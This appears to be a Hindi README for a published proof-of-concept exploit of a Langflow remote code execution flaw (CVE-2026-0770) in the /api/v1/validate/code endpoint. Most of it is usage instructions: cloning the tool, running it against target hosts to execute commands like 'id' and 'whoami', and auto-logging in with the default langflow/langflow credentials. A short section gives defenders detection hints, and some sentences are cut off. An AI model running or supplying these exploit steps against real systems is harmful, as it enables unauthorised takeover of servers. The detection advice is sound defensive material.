
Langflow रिमोट कोड एक्ज़ीक्यूशन (RCE) प्रूफ-ऑफ-कॉन्सेप्ट
Langflow में रिमोट कोड एक्ज़ीक्यूशन भेद्यता
यह भेद्यता निम्नलिखित को प्रभावित करती है:
Langflow
CVE-2026-0770 निम्नलिखित एंडपॉइंट में एक रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है:
/api/v1/validate/code
जब AUTO_LOGIN=true और डिफ़ॉल्ट क्रेडेंशियल सक्षम होते हैं, तो हमलावर यह कर सकते हैं:
यह समस्या सत्यापन के दौरान असुरक्षित Python कोड मूल्यांकन से उत्पन्न होती है।
git clone https://github.com/0xgh057r3c0n/CVE-2026-0770.git
cd CVE-2026-0770
सुनिश्चित करें कि Python 3.8+ इंस्टॉल है।
निर्भरताएँ इंस्टॉल करें:
pip install requests colorama
python3 -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
pip install requests colorama
इंटरैक्टिव रिमोट कमांड एक्ज़ीक्यूशन लॉन्च करें:
python3 CVE-2026-0770.py -t http://target:7860
उदाहरण:
python3 CVE-2026-0770.py -t http://192.168.1.100:7860
python3 CVE-2026-0770.py -t http://target:7860 -c "id"
उदाहरण:
python3 CVE-2026-0770.py -t http://localhost:7860 -c "whoami"
python3 CVE-2026-0770.py -t http://target:7860 -c "ls -la" -v
विस्तृत डिबगिंग आउटपुट दिखाता है।
python3 CVE-2026-0770.py -t http://target:7860 -k "your.jwt.token"
यदि कोई टोकन प्रदान नहीं किया गया है, तो स्क्रिप्ट निम्नलिखित का उपयोग करके ऑटो-लॉगिन का प्रयास करती है:
username: langflow
password: langflow
सफल होने पर, यह एक access_token प्राप्त करता है और आगे बढ़ता है।
प्रशासकों को यह करना चाहिए:
AUTO_LOGIN अक्षम करें/api/v1/validate/code तक पहुँच प्रतिबंधित करेंनिम्नलिखित पर नज़र रखें:
/api/v1/validate/code पर संदिग्ध POST अनुरोध
निम्नलिखित युक्त कोड:
__import__subprocessthrow(Exception(डिफ़ॉल्ट क्रेडेंशियल का उपयोग करके बार-बार लॉगिन प्रयास
.
├── CVE-2026-0770.py
├── LICENSE
└── README.md
0xgh057r3c0n 🔗 https://github.com/0xgh057r3c0n
सुरक्षा शोधकर्ता | शोषण डेवलपर | PoC लेखक
MIT लाइसेंस के तहत वितरित। पूर्ण लाइसेंस यहाँ देखें:
यह प्रोजेक्ट निम्नलिखित के लिए है:
उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, अवैध है।